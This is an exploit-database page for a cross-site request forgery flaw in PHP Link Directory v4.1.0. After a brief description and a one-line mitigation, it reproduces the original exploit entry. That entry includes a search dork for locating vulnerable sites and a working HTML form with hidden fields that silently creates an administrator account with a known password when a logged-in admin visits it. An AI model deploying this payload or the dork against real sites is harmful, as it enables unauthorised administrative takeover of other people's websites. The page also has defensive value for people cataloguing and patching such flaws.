header-logo
Suggest Exploit
vendor:
PHP Link Directory
by:
AtT4CKxT3rR0r1ST
8.8
CVSS
HIGH
CSRF
352
CWE
Product Name: PHP Link Directory
Affected Version From: 4.1.2000
Affected Version To: 4.1.2000
Patch Exists: NO
Related CWE: N/A
CPE: a:phplinkdirectory:phplinkdirectory:4.1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

PHP Link Directory v4.1.0 CSRF Vulnerability (Add Admin)

PHP Link Directory v4.1.0 is vulnerable to CSRF which allows an attacker to add an admin user to the application. The attacker can craft a malicious HTML page containing a form with hidden fields that when visited by an authenticated user, will submit the form and add an admin user to the application.

Mitigation:

The application should implement a CSRF token to verify the authenticity of the request.
Source

Exploit-DB raw data:

PHP Link Directory v4.1.0 CSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.phplinkdirectory.com/
.:. Dork           : "Powered by: PHP Link Directory"
.:. Gr34T$ T0 [h1ch4m] & [Risky] & [www.Hack-Book.com] 

####################################################################

===[ Exploit ]===
<html>
<head>
<title>PHP Link Directory v4.1.0 [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/admin/conf_users_edit.php?action=N">
<input type="hidden" name="LOGIN" value="webmaster"/>
<input type="hidden" name="NAME" value="Mohammad Hussien"/>
<input type="hidden" name="PASSWORD" value="123456"/>
<input type="hidden" name="PASSWORDC" value="123456"/>
<input type="hidden" name="LANGUAGE" value="sq"/>
<input type="hidden" name="EMAIL" value="example@hotmail.com"/>
<input type="hidden" name="cemail" value="1"/>
<input type="hidden" name="LEVEL" value="1"/>
<input type="hidden" name="formSubmitted" value="1"/>
<input type="hidden" name="id" value=""/>
<input type="hidden" name="exclude_id" value=""/>
</form>

</body>
</html>
####################################################################